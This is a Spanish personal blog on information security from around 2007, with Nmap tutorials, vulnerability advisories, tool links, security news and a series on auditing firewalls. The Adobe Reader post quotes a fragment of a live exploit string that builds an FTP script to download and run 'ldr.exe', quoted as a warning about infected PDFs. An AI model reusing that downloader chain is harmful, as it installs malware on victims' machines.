Nmap 4.50 (10th Anniversary Edition) released!!

Me congratula comunicaros que Fyodor ha liberado una nueva versión para NMAP en concreto la versión 4.50...con el pretexto de que la herramienta ha cumplido 10 años... ahí es nada....

En esta nueva versión se han incluido nuevas funcionalidades...pulsa aquí

Y para los que utilizan NMAP por primera vez entorno gráfico....

Yo que tú me la descargaba

Vulnerabilidad en Apache 1.3.x y 2.2.x : XSS

Buenas.........

Otra vulnerabilidad descubierta en este caso le cae al servidor Web Apache...

La vulnerabilidad que afecta a las versiones 1.3.x está localizada en el mod_imap y está causada porque algunas entradas no se eliminan antes de ser vueltas a los usuarios.Esto...podría ser utilizado por un atacante remoto para inyectar código ejecutable (JavaScript p.ejem). Para que la vulnerabilidad pueda ser explotada se requiere que mod_imap esté activado y sus ficheros
accesibles de forma pública.

La vulnerabilidad que afecta a las versiones 2.2.x está localizada en la función mod_imagemap y al igual que la anterior, permite inyectar código ejecutable porque las entradas no se eliminan correctamente.Para que la vulnerabilidad pueda ser explotada se requiere que mod_imagemap esté activado y sus ficheros accesibles de forma pública.

Más información:

Para las versiones 1.3.x

Para las versiones 2.2.x

Información obtenida de Hispasec

Vulnerabilidad Microsoft FTP Client

Una vulnerabilidad más pal saco.....

Vulnerabilidad descubierta el 20 de Noviembre y comunicada al fabricante el 28 de Noviembre.

Resumen: La vulnerabilidad descubierta en el cliente FTP de Microsoft, produce como resultado un BufferOverflow en la máquina víctima.

Aplicaciones afectadas: Microsoft FTP Client

Plataformas afectadas: W2K Server, W2K Professional, Wxp, otras versiones pueden verse afectadas.

Descubridor: Rajesh Sethumadhavan

Descripción: Un usuario malintencionado (ñam ñam...jajajaja) puede crear un paquete con un payload determinado el cual se ejecute cuando un usuario ejecuta comandos FTP tales como: "mget" , "ls", "dir", "username" y "password", y el resultado es un BufferOverflow en la máquina cliente.

Impacto: La vulnerabilidad puede permitir la ejecución de código arbitrario con los privilegios del usuario logeado.

Proof of concept: "mget" "list"

Solución: No existe solución.....no se ha publicado parche.

Aquí tenéis pantallazos de los resultados de la vulnerabilidad.... (especial dedicación...rocherna&company)


Link donde se explica la vulnerabilidad

Empezarán a crecer como setas los servidores FTP en internet....??? jajajajajaja (risa malefica)

Tools

Buenas a todos

Una nueva de ristra de herramientas para descargar....

De la gente de S21 Yersinia

De la gente de Isecom Scare

No les conozco pero presumen de que su herramienta ocupa el segundo lugar en el ranking de Les Trophées du Libre 2007. Unicorn

Auditando IDS??? Tcpopera

Ala chicha teneis.... y comentarios????

nUbuntu

nUbunto es una distro, basada como no en Ubuntu, con la peculiridad, de que es un sistema operativo al que se le añaden una serie de herramientas muy interesantes y al que se le ha desinstalado paquetes innecesarios tales como: Gnome, Openoffice.org, y Evolution.

La intención de sus creadores era la de utilizar un S.O, "tunneado" que facilite la ardua tarea de los Pen-testers....;)

Visita obligada a la url de nUbuntu

Para descargarlo pulsa aquí

Unos Screenshots de la distro?

Algún comentario???

Nueva versión Firefox 2.0.0.10+ Plug-ins Pen-tester

Se ha liberado la nueva versión del navegador Firefox 2.0.0.10 dicha versión corrige tres vulnerabilidades .

Yo que tú, actualizaba...para descargarlo pulsa aquí

Y si de paso quieres un par de plug-in para Firefox, te comentaré que en esta url tienes dos y que vienen de maravilla para cualquier pen-tester.Los dos plug-in son para realizar XSS y SqlInjection.

Una vez descargardos, instalarlos en el navegador, reiniciarlo y vereís vereís....

Para cualquier duda, visitar las FAQ en la misma URL.

Que os parece? interesantes plug-ins....

Detención del "Hacker del año"

Ha sido detenido el consultor de seguridad sueco Dan Egerstad que este verano reveló datos sensibles de numerosas embajadas que utilizaban la red TOR para asegurar su anonimato....

Le encontraron con 8 PS2 en su apartamento, y le han acusado de robo, entre las acusaciones que recibirá claro....jode que vicio tenía el colega con la PS2....

La noticia la tenéis aquí

El tipo de ataque que realizó, era muy básico a la vez de ingenioso, la red TOR ayuda a obtener anonimato, pero no cifra las conexiones con lo que si os echais un vistazo a como funciona la red TOR seguro que se os hubiese ocurrido algo similar como colaborar con un nodo más en la red TOR y ponerse a escuchar conexiones...ñam ñam....

Para ver la noticia pincha aquí

Si hubiese publicado de otra manera su investigación, seguramente hubiese tenido menos problemas de los que va a tener, aunque hoy en día cualquier aviso de una vulnerabilidad tiene su precio...no creeis?

Nuevo número de INSEGURE MAGAZINE

Insegure Magazine ha publicado su número nuevo 14 esta revista es de contenido totalmente gratuito y se publica cada 3 meses (si no me equivoco...)

Los contenidos de este mes son:

• Attacking consumer embedded devices
• Review: QualysGuard
• CCTV: technology in transition - analog or IP?
• Interview with Robert "RSnake" Hansen, CEO of SecTheory
• The future of encryption
• Endpoint threats
• Review: Kaspersky Internet Security 7.0
• Interview with Amol Sarwate, Manager, Vulnerability Research Lab, Qualys Inc.
• Network access control: bridging the network security gap
• Change and configuration solutions aid PCI auditors
• Data protection and identity management
• Information security governance: the nuts and bolts
• Securing moving targets
• 6 CTOs, 10 Burning Questions: AirDefense, AirMagnet, Aruba Networks, AirTight Networks, Fortress Technologies and Trapeze Networks

Url de la revista aquí

Para descargar la revista en formato .pdf aquí

Mod´s de validación para Apache

Buenos días....

He encontrado una entrada interesante en el blog de Sergio Hernando que nos cuenta los diferentes métodos que nos ofrece Apache para validación....

Os he colocado los que me parecen más interesantes:

• mod_auth_MAC Autenticación basada en MAC...cuidado con los posibles ARP Poison...;)
• mod_auth_openpgp Autenticación basada en cifrado simétrico...clave pública.
• mod_auth_ldap Autenticación basada en LDAP.
• mod_authn_digest Autenticación basada MD5
• mod_auth_radius Autenticación por RADIUS
• mod_auth_shadow Autenticación basada en /etc/passwd o similares, de sistemas Nix*

Ahora solo falta que algún íntrepido Admin, le pique el gusanillo de la seguridad y con permiso de su todopoderoso jefe le de la "gracia" (que no es poco) de implementar estos mod para apache..

Comentarios?

Actualización YA

Hola a todos en breve actualizaré el blog con nuevos contenidos...

Seguiré dando caña ;)

Cambio y corto!

Nmap II

Seguimos con los comandos básicos para aprender como funciona nmap

Existen distintos tipo de scanneo como nos indica la herramienta....

SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags : Customize TCP scan flags

Se pueden lanzar diferentes tipos de conexión -sS (SYN) -sA (ACK) -sF (FIN)
Con lo que una sintaxis del scanneo de un host sería:

nmap -sS xxx.xxx.xxx.xxx

Según utilicemos el tipo de conexión para cualquier scanneo obtendremos una respuesta u otra ;)

Como bien sabemos los firewalls, una de las primeras cosas que suelen hacer es descriminar el tráfico ICMP por las consecuencias que pudiese tener...

nmap -sS xxx.xxx.xxx.xxx -P0 en nmap no emitir tráfico ICMP se hace con la opción -P0 ;)

Como dice la herramienta podemos, especificar el rango de puertos a utilizar...

PORT SPECIFICATION AND SCAN ORDER:
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
-F: Fast - Scan only the ports listed in the nmap-services file)
-r: Scan ports consecutively - don't randomize

Un ejemplo para scannear un servidor web sería....

nmap -sS xxx.xxx.xxx.xxx -P0 p80

Con estos primeros pasos, ya se pueden hacer pruebasde ver como responde la herramienta, más adelante explicaré más funcionalidades e interpretación de resultados....

Saludos domingueros!!!

Educación Vs Capacidad

Esta mañana he leido en un periodico un interesante artículo, con el que me he sentido identificado, en dicho artículo se habla de como un chaval, de 16 años, es capaz de dar soporte avanzado y "pegarse" desde hace 5 años con su distro de Linux, y a la vez ser un mal estudiante.

Como se puede tener tanta capacidad intelectual como para con 11 años empezar a trabajar bajo Linux y después de 5 años con 16 tener un nivel superior a la media, en informática y ser mal estudiante....aquí algo no me cuadra...

Está claro que nuestro sistema educativo está creado por cafres y no solo por este claro ejemplo, ya que no hace falta ser un hacha en informática con 16 años, para ver que nuestro sistema educativo no termina de triunfar, pero no ahora, sino desde hace unos añitos...

Aqui queda la noticia

Si te sientes identificado/a deja algún comentario....

Virus On the Wild: Storm Worm

Esta noche, es una de esas noches de las que tenemos al año, muy propensas para ir en el subject de cualquier correo electrónico, con no muy buenas intenciones.... ;)

De los virus que nos "acechan" hoy en día, una gran cantidad están orientados al robo de credenciales bancarios, mientras que hay otro tipo de virus, los menos, los llamados "románticos" los cuales persiguen otra finalidad muy diferente que la obtención de credenciales y posterior "cyber-atraco".

Uno de estos virus de difinición "romántica" está apareciendo como uno de los que posee una tasa de infección muy alta, el virus al que me refiero es Storm Worm. Dicho virus está siendo detectado con un subject en muchos de los correos adjuntos en los que va, utilizando la cobertura que da una noche como la de hoy, utilizando ingeniería social, a la vieja usanza vamos....

Información sobre el virus:

Websense

Honeyblog

S21secBlog

Que tiempos aquellos los de 29a !!!!

Asi que ojo al parche, con el bichito, porque dará curro extra a algún Admin de seguridad que conozco...!!! y a pasarlo bien, sin que os den muchos sustos....

Un abrazo grande para los "bichos" que estan evitando las infecciones del día a día...Perico, Jorghino,David....gracias por lo que me enseñasteis...especímenes mios!!

Cambio y corto!

Manos arriba!! esto es un atraco...on-line

Por un lado tenemos a....los bancos

Por mucho que nuestros bancos se empeñen en afirmar lo contrario, las gestiones que realizamos a través de la la banca electrónica no son seguras y les aplican riesgos, que no están en el lado del cliente de manera exclusiva...

Como se comenta en esta noticia

No sería mejor el dejar de echar la culpa solo a los usuarios y asumir las deficiencias propias en la seguridad?.Pero claro cuando se trata de asumir pérdidas mejor echar la culpa al usuario....y su formación en seguridad.

Y por otro lado....a los que se pasan de listos!

También están los que mediante el timo de la estampita, (phising) nos atracan on line, como dice esta noticia

Y la pregunta que me hago es...y todo este tipo de "atracos on-line" es la punta del iceberg? de cuantos casos no tenemos constancia con una solución para los afectados?

Bueno, menos mal, que nuestra seguridad ciudadana hace este tipo de eventos....les servirá de algo?....

En fin......

Alerta: Vulnerabilidades en productos Acrobat

Buenas....

A pesar de que la vulnerabilidad no es nueva, y por lo tanto hay parche y nueva versión, existen numerosos exploit´s para Acrobat Reader.

Especialmente estan siendo como no..unos archivos adjuntos en el correo electrónico el principal foco de infección, los archivos vienen como “BILL.pdf” y “INVOICE.pdf”, aunque los nombres pueden cambiar según el exploit obj<>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&” “&” “nul.bat)/S/ URI>

Los espacios en la cadena expuesta están orientado a impedir que los antivirus detecten el patrón malicioso.Por lo que una vez instalado el código malicioso, explota la vulnerabilidad, con la cual, se puede instalar un bot en la máquina como robo de credenciales, por un troyano.

Se confirma que son vulnerables: Adobe Reader 8.1 y anteriores, Adobe Reader 7.0.9 y anteriores, Adobe Acrobat Professional, 3D y Standard 8.1 y versiones anteriores, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9 y anteriores.

Aqui os pongo lo que recomienda la gente de SANS.
Parches para Acrobat Reader

Destacar que la vulnerabilidad afecta solamente a Pc´s con Windows Xp con Internet Explorer 7.0

Asi que ya sabeis....más vale prevenir....

Información sacada del Blog de Sergio Hernando

Nmap

Llegó el momento tan esperado :P

A continuación os explicaré en sucesivas entradas como utilizar esta herramienta asi pues...vamos a darle chicha al nmap...!!!!

La herramienta está hecha para trabajar en diferentes sistemas operativos, tanto en Windows como en Unix. Dentro de mis preferencias, yo la utilizo en mi distro de linux (Fedora Core 7) y me va como la seda.... y la verdad nunca me ha dado por instalarla en un "ventanas" , pero me imagino que con el uso que hace de los recursos del sistema dicho sistema operativo....se perderá en funcionalidad... :P

La herramienta la podéis decargar de aquí

Una vez que os la instalais, sorpresa!!! no tiene iterfaz gráfica de usuario (GUI) funciona por comandos!!! asi que el que quiera pescar peces que se moje el culo!!!

Me consta que hay GUI para diferentes sistemas operativos, yo por lo que he visto de la interfaz gráfica es que le resta a la herramienta potencia, puesto que no la puedes configurar con todos los parámetros que tiene...asi que ha "comandear"

Lo dicho una vez instalada, tenemos que iniciar una shell ya sea a través de Ms-Dos o cualquier teminal de Unix.

Una vez iniciado el modo terminal:

1. Escribimos nmap

Y vemos las opciones que nos da la herramienta, así que lo que toca, es echarse un vistazo a las opciones porque mañana hablaré de ellas....

Cambio y corto!

SWATting or swatting

Hasta los de azul pillan..

El jueves 18 de Octubre fue detenido un chaval de 19 años, como en los EE.UU, acusado de realizar un ataque denominado "SWATting or swatting".

Dicho ataque consta en spoofear el número de teléfono de tu víctima, para posteriormente llamar a los "Swat" y dar la falsa alarma de que en tu casa o en otro sitio pasa algo grave...

Al angelito no se lo ocurrió otra cosa que, llamar a los que primeros disparan y luego preguntan...aunque por ese país yo creo que todos actuan igual, sea los hombres de azul, gris o morado...

La noticia la leí aquí

Eventos de Seguridad

Os informo de próximos eventos de seguridad en Madrid:

Capdesi , se ha abierto el plazo de inscripción!!! yo intentaré no perdérmelo.... el programa de las ponencias os lo dejo aqui.

Microsoft Technet Security Day

Ambos eventos son gratuitos....y tal como está el euribor...estas cosas se agradecen!!!!

Free Software

He descubierto un programa muy parecido a uno que os puse en un una entrada antigua.Dicho programa, lo que hace es verificar dentro de los programas instalados en tu sistema operativo, el estado de las actualizaciones de los mismos. También tiene un servicio de news, donde se publican las diferentes actualizaciones de los 80.000 programas que soporta la aplicación.

Está en fase beta, y como sabeis, un programa que no esté actualizado, puede dar problemas tanto a nivel de sistema operativo como a nivel de seguridad.... ;)

Para descargar pulsa aquí

Nueva versión de Firefox 2.0.0.8

El viernes 19 se ha lierado la nueva versión del navegador Mozilla Firefox 2.0.0.8. Esta nueva versión soluciona 8 vulnerabilidades, de las cuales 2 son consideradas críticas...

A parte, uno de los cambios que se recoge en esta nueva versión, es el tratamiento de determinadas URL´s maliciosas para sistemas operativos Windows XP. Como la solución a "cuelgues" del nevegador.

Pulsa aquí para descargarlo

Regresé...!!!

Buenas a todos/as

Despues de una semana "infernal" que he sufrido para la preparación de un examen que tuve, vuelvo a estar on-line para refrescar los contenidos del blog....

Temas pendientes:

• Nmap
  
• Tratar nuevas publicaciones que tengo en el tintero....

Cambio y corto!!!

Para el finde...

Lecturas recomendadas...

Discos duros híbridos, acceder al disco duro sin encender el Pc
Death Master
Auditando Mainframes

No todo tiene que ser informatica...

Los reyes del mambo...
Obey

Auditando Firewalls: NMAP

Seguimos con la auditorá de firewalls, y esta vez toca hacer una introducción al todopoderoso NMAP.

Esta herramienta, posiblemente sea la mejor, por no decir que es el mejor scanner de puertos que existe, ya que lo tiene todo:

• Es gratuita
• La capacidad que tiene la herramienta por si misma.
• Existe versión para Windows como para diferentes versiones de Unix.
• La amplia información existente en la red para su uso

Que es NMAP?

Nmap es una herramienta que sirve para scannear puertos con una cantidad de parámetros impresionantes, tanto para los diferentes tipos de scanneo, como los métodos soportados para crear determinados paquetes.

Para que se usa?

El uso que se da a esta herramienta, es para ver que puertos tiene publicados un host y el estado de los mismos (open/close/filter).

Traduzco...;) En entradas anteriores, hemos hablado de la función de un firewall, y los diferentes tipos existentes en el mercado. Desde un punto de vista de un usuario doméstico nuestro firewall personal nos está monotorizando continuamente las conexiones y nuestro equipo estaría protegido.

Y yo os pregunto ahora, sabeis que puertos teneis publicados por el firewall y el estado de estos puertos?. En otras palabras pensais que vuestro firewall hace su trabajo?.Nmap es la herramienta que nos va a mostrar como trabaja nuestro firewall para protegernos de conexiones no deseadas ;)

Cuando se inicia un ataque a nivel de red, es fundamental conocer si un host está "vivo" y si dicho host tiene puertos publicados, para saber que tipo de servicios están detrás de esos puertos abiertos... :P

Cada vez que hago una auditoria de una instalación de un firewall realizo un scanneo de puertos para ver si ha sido bien configurado, es decir verificar que puertos están publicados a internet y el estado de los mismos ya que las sorpresas en seguridad implican....posibles ataques

En la siguiente entrada entraremos en "materia", explicando el uso de la herramienta y como interpretar los resultados que nos muestra.

Dedicado a los "admin" de firewalls en especial a uno de ellos de quien hoy es su santo...que por cierto... a ver si se anima a publicar alguna entrada...:P guapa!!!AlucarD!!!!!

Niña cierra los puertos...que te entran los barcos!!! ;))))

Free Software

Os pongo el enlace a un software, gratuito de la gente de Secunia, el programa, que es para plataformas Micro$oft verifica si los programas instalados, están actualizados a la última versión y al corriente de los parches que los fabricantes han liberado.

Os servirá para ver evitar males mayores con los programas que teneis instalados y sus bug

Para descargar pincha aqui

Noticia: Ataque DDoS

Buenas a todos/as

Me hago eco de una noticia que he leido en securityfocus, sobre un ataque llevado a cabo contra una web.

Dicho ataque ha consistido en crear una denegación de servicio (DoS), para que la web en cuestíon no estuviera disponible. El autor de 21 años de edad, tenía bajo su "mando" una botnet de nada menos que 7000 máquinas.....que mounstro el tío....

Claro, el tío SAM dió buena cuenta de ello deteniendo al personaje en cuestión.....

Con una noticia así, quiero daros a entender de que consta un DDoS , sus consecuencias y aplicarlo a la auditoria de firewalls que estamos llevando a cabo.

Como sabeis en capítulos anteriores, en las auditorias de firewall, hemos hablado de que una de las cosas que hace un firewall es bloquear conexiones, cerrando puertos para que no estén disponibles en internet. Pero que pasa si tenenemos un servidor web? ( puerto:80/ TCP) , pues que en el firewall, el puerto asociado al servicio debe de estar abierto, para que el público de internet pueda conectarse y desde su navegador ver el contenido de ese servidor.Ya que si cerramos el puerto asociado al servicio Http, no podremos publicar ninguna web y por lo tanto no dar ningún servicio, vamos que es como el que tiene hambre y se arrasca la barriga...

Ahora bien, nos encontramos que si tenemos un servicio publicado por internet como puede ser un servidor Http, con su puerto correspondiente ( Puerto: 80/TCP) abierto para tener acceso desde cualquier navegador, también está accesible, para "inundarlo" a peticiones, y crear una denegación del servicio.

Como veis un firewall no soluciona todos los problemas de seguridad ;)

Más adelante hablaré de este tipo de ataques, como detectarlos y como remediarlos...si es que se puede...;)

Por cierto queda pendiente en la siguiente entrada el uso del todopoderoso NMAP para el scaneo de puertos que puede tener un host abiertos/cerrados detrás de un firewall.

Como siempre, al final de cada entrada se esperan comentarios.....

Tal dia como hoy....

Quiero hacer un recordatorio, al día de hoy, un 9 de Octubre....el motivo es porque tal día como hoy(hace 40 años), asesinaron al que podría ser, si hubiese sido informático, (que no médico) el mejor hacker de la historia... , quiero recordar a Ernesto Guevara de la Serna..."Che"

Personajes como este, hacen que se mueva el mundo, y que nos hagan ver las cosas desde otro punto de vista....

Hasta la victoria siempre!

El regreso de...Auditando Firewalls

Buenas a todos, después de una semana de inactividad en el Blog, vuelvo a la carga...y curiosidades de la vida, vengo de vuelta de auditar un Firewall empresarial...la semana fue productiva....

No quiero empezar sin dedicar esta entrada al agente de Vitoria, que me han puesto las cosas muyyyyyy fáciles para poder currar, y como no a mi inestimable "GPS" con patas, que me guió tan bien por el maravilloso mundo de los pinchos....de lo que viene siendo Euskadi, si podéis, pasaros a conocerlo es una chulada.....

Y una vez cumplidas las dedicatorias, vamos al tajo....

Hay una frase que siempre aplico a una buena configuración de un Firewall, "niña cierra los puertos que te entran los barcosssss".

Y esto que quiere decir?, a lo que me refiero con esa frase, es que una de las funciones importante por no decir las más importante en un Firewall es cerrar los puertos que publica nuestro S.O, asi pues, si nuestro Pc, no necesitase enviar correo, deberiamos configurar nuestro Firewall, para que este puerto en concreto el 25 aparezca cerrado, y no admita ninguna conexión desde Internet no deseada...

La máxima es, que no publiquemos puertos que no sean necesarios, porque sino...nos entrarán los barcos!!!! hasta el muelle de descarga ;)

Asi pues, como sabemos, detrás de un puerto hay un servicio, dicho servicio, si está publicado en Internet, sin restricciones de conexión, puede ser vulnerable...Porque, aunque vuestro sistema este parcheado 100% y ese servicio no tenga bugs, siempre, repito siempre, hay una persona detrás, la cual configura ese servicio, sea, Administrador de sistemas, o un usuario casero....y por lo tanto, cabe la posibilidad de que haya un error de configuración, como veis la seguridad 100% es imposible...

Para un usuario malintencionado, lo primero que busca en una máquina a atacar, es un puerto abierto, y una vez que descubre ese puerto abierto, busca la versión del servicio publicado e intenta atacar, con la información recibida...(versión del S.O, versión del servicio publicado, ya sea FTP, SMTP etc...) ya sabeis la información es poder...

En la próxima entrada aprenderemos a manejar alguna herramienta por no decir la "herramienta" de scanneos de puertos, el todo poderoso NMAP, larga vida NMAP....los que van a scannear te saludan!

Auditando Firewalls: De sockets, puertos y servicios

Sigamos con lo siguiente en la auditoría de firewalls, el concepto de puerto , socket y servicio algo fundamental para enterder como funciona un firewall, y asi como auditarlos ;)

En capitulos anteriores definimos un firewall, como un elemento soft que monitorizada las conexiones entrantes y salientes de un host. Y os preguntareis para que sirven las conexiones? :P, para eso nos meteremos a ver un poco de TPC/IP.....

Como sabeis el sr TCP/IP es un protocolo , y como tal dicta unas normas...a las que los firewalls se someten ;) como el resto de programas que utilizamos (clientes de correo, nevegador, emule :p ftp).Entre muchas cosas TCP/IP nos dice que para que determinados servicios funcionen, tienen que estar publicados en una serie de puertos predefinidos..

Es decir, si queremos enviar un correo electrónico desde nuestro programa cliente, este enviará la petición contra el puerto 25 del servidor que está escuchando...el cual que nos permitirá enviar correo electrónico al destinatario que queramos.
Para esta acción, el firewall que tenemos en nuestro pc tiene que permitir la salida del tráfico generado por el protocolo SMTP y el servidor que está en el otro lado tiene que escuchar el tráfico que vaya dirigido hacia ese puerto 25 (para lo cual su firewall tiene que permitir tráfico contra ese puerto) que también forma parte del mismo protocolo.

Y quien permite que esa conexión, se realice? nuestros queridísimos firewalls!!! ya que permiten el tráfico que se genera a ambos lados (tanto de nuestro pc como del servidor de correo) y se produzca una conexión, para que el servicio pueda funcionar, y se puedan enviar esos correos tan altruistas con archivos adjuntos .ppt que tanto nos gustan... <8-)

Asi pues, como vereis, lo que hacen los firewalls es permitir o denegar flujo de conexiones contra puertos determinados...

Un esquema explicativo funcionaría asi.... servicio-socket-puerto.....

Un servidor Http , para que pueda publicar páginas web, tiene que tener un servicio; que sería un servidor web como por ejemplo Apache o ISS de microchoft, que va "conectado" a un socket, el cual va asociado a un puerto en este caso por ser el protocolo Http, sería el puerto 80.

Y???, como lo veis?....

Un poco más abajo de esta mismo artículo se pueden poner comentarios ehhhhh son gratis...;)

Cambio y corto!

Lecturas recomendadas para el finde

Hakin9
Botnets
Demo de Exchange Server 2007 en imagen de virtual pc
Algo sobre protocolos

Si me da tiempo y el cierre del Moreno´s Bar me lo permite :P seguiré este finde con la auditoria de firewalls, ñam ñam, quedan cosillas de teoría y luego la práctica ;) jejejeje

Y...se siguen esperando comentarios.....iogaaaaaaaaaa!!

Cambio y corto!

Capsdesi

Buenas todos/as

Por fin viernes.. santo viernes

Asi que entremos en materia que el fin de semana ya está aquiiiiiiiiiiiiiiiiiiiii!!!.

Todos los años en la Universidad Politécnia de de Madrid (UPM) de la que soy miembro desde hace un par de años, (yaaaaaaaa padre yaaaaaaaaaaa si hubiera estudiado más antes....), se realiza el CAPSDESI, que son unas conferencias, en donde gente experta, trata diferentes temas sobre seguridad de la información, el plazo de inscripción comienza el 15 de octubre y la asistencia es gratuita pero de aforo limitado a 550 almas yo iré y tu???

Y recuerda cual es el lado oscuro....

Auditando firewalls: Esquema de red "empresarial"

Lo que tenemos aquí sería el típico esquema de red a nivel empresarial, con dos niveles de firewal ;) para implementar más seguridad, y controlar el tráfico entrante y saliente en dos puntos, y si os fijais los firewalls aparecen en parejas, lo que se denomina cluster, porque en caso de fallo, la empresa, no se queda "al descubierto" y sus conexiones no se ven afectadas, ni desde un punto de vista funcional ni de seguridad.

También hay que fijarse en lo que se llama zona desmilitarizada o DMZ, a ver como lo explico... :p es una red separada de la red privada donde se desarrolla la actividad empresarial de los usuarios y servidores corporativos.

Y esto porque se hace?, muy sencillo, en una DMZ, es donde nos encontramos los servidores que tienen direccionamiento público, y publican servicios en internet, os acordais del ejemplo casero? ;) como tal, estos servidores son los que se "exponen en internet" y son sobre los que el riesgo recae, por ser públicos, por eso mismo, en caso de que ocurra un incidente de seguridad, están apartados de la red privada corporativa para que, ese incidente no tenga repercusión en la red privada y por lo tanto en la organización entera.

Que os parece todo este mogollón? Espero comentarios...... :P

Auditando firewalls: Esquema de red "casero"

Seguimos con un poco más de teoría sobre firewalls, como veis, esta sería la una arquitedtura de red en modo "casero", en donde cualquier conexión (entrante o saliente) es filtrada por el firewall.

Lo que tendríamos aquí es una conexión a internet con nuestra ip pública suministrada por nuestro queridísimo ISP <8-( con lo que nuestro Pc, se presenta en internet con la famosa ip públia. Y claro si nos "presentamos" en internet con nuestra ip, es la que al resto del mundo le importa para acceder a los posibles servicios que ofrezcamos, como para nosotros acceder a los servicios que nos ofrecen.

De tal manera que si monto un servidor "efetepe" y alguien quiere acceder tendrá que poner en su programa cliente de "efetepe" la dirección pública que ofrece ese servicio al resto del mundo.

Fácil no?, os recuerdo que al final de cada "artículo" que escribo podeis poner comentarios...de lo mucho que os gusta la web etc... :P inclusive, de las posibles dudas que tengais....

Auditando firewalls que es gerundio!

Salud2, navegantes....

Siendo martes, día precioso, ya que no queda nada para el fin de semana (madreeeeeeeeeee), nos iniciaremos en el maravilloso mundo de los firewalls, que mejor día que un martes? asi que manos a la obra!

Para empezar, definiré un firewall, como un elemento software que contiene una tabla de estado de las conexiones que pasan por el, tanto entrantes como salientes.En dichas tablas, es donde el firewall interpreta las conexiones para posteriormente realizar las acciones que le hemos indicado, es decir, bloquear o permitir el tráfico que pasa por el.

Distinguimos dos tipos de firewall:

1. Firewalls a nivel de aplicación.
2. Firewalls a nivel de red.

Cada uno de ellos se mueve en capas diferentes del modelo O.S.I

• Firewalls a nivel de aplicación

Estos firewalls son lo que conocemos habitualmente como firewalls personales, actualmente, están enfocados a usuarios domésticos. Este tipo de firewalls tienen como misión el vigilar las conoxiones, que se realizan desde y contra nuestro ordenador personal, desde un punto de vista de aplicación.
Es decir, los firewalls personales, controlan las conexiones que realizan las aplicaciones instaladas en nuestro ordenador personal, las cuales, necesitan conectarse a internet, o desde internet necesitan conectarse a ellas :(

Existen en el mercado numerosos tipos de firewalls de aplicación, y bastantes de licencia GNU

• Firewalls a nivel de red

Este tipo de firewalls se mueven a un nivel más bajo del modelo OSI, entre las capas de nivel 2 , 3 y 4. Están pensados para un entorno empresarial, en donde la cantidad de conexiones que se puenden realizar, son cientos o incluso miles. Al haber una complejidad de conexiones a este nivel, los "vigilantes" (que son los firewalls) de este tipo de conexiones, tienen que tener unas características especiales, y diferentes a lo que son los firewalls de aplicación.

Dichas características entre otras son:

1. Entorno de adminsitración más complejos.
2. Alta disponibilidad, mediante clusters.
3. Entorno de monotorización de las conexiones rechazadas permitidas, etc
   
4. Etc..

Una vez, que hemos hecho una breve pero intensa introducción de lo que son los firewalls, empezaremos a "meterles mano" en los siguientes capítulos.

Cambio y corto!

Manifiesto

Buenas

Mediante este medio tan poderoso como son las redes sociales y para simplificar los blogs, a partir de ahora, intentaré transmitiros, como vivo la seguridad de la información....y algunas cosas más que me parecen revelantes, tal como se mueve el mundo hoy en día...

Compartir conocimientos, es la finalidad de este blog, todo el mundo debería de terner derecho a saber lo que ocurre en sus ordenadores y en la "selva" de internet con su fauna corespondiente....porque hay cada bicho suelto....

No os espereis un blog para realizar el "mal" como por ejemplo de como conseguir la contraseña del msn de tu chica o de como pisarle el wifi al vecino vamós que duros a 4 de las antiguas pesetas no va a ver, sino un sitio donde se puedan compartir conocimientos, e inquietudes con el único fin de aprender algo más.

¿Para empezar os suena lo que os pongo más abajo?, os avanzo que no es el programa electoral de ningún partido político :P

• Pasión
• Libertad
  
• Conciencia social
• Verdad
• Anti-Fascismo
• Anti-Corrupción
• Lucha contra la alienación del hombre
• Igualdad-social
  
• Libre acceso a la información
  
• Valor social (reconocimiento entre semejantes)
• Accesibilidad
• Actividad
• Preocupación responsable
• Creatividad
  

Mas información: http://es.wikipedia.org/wiki/%C3%89tica_hacker

Haceros una idea de por donde van a ir los tiros...

Cambio y corto!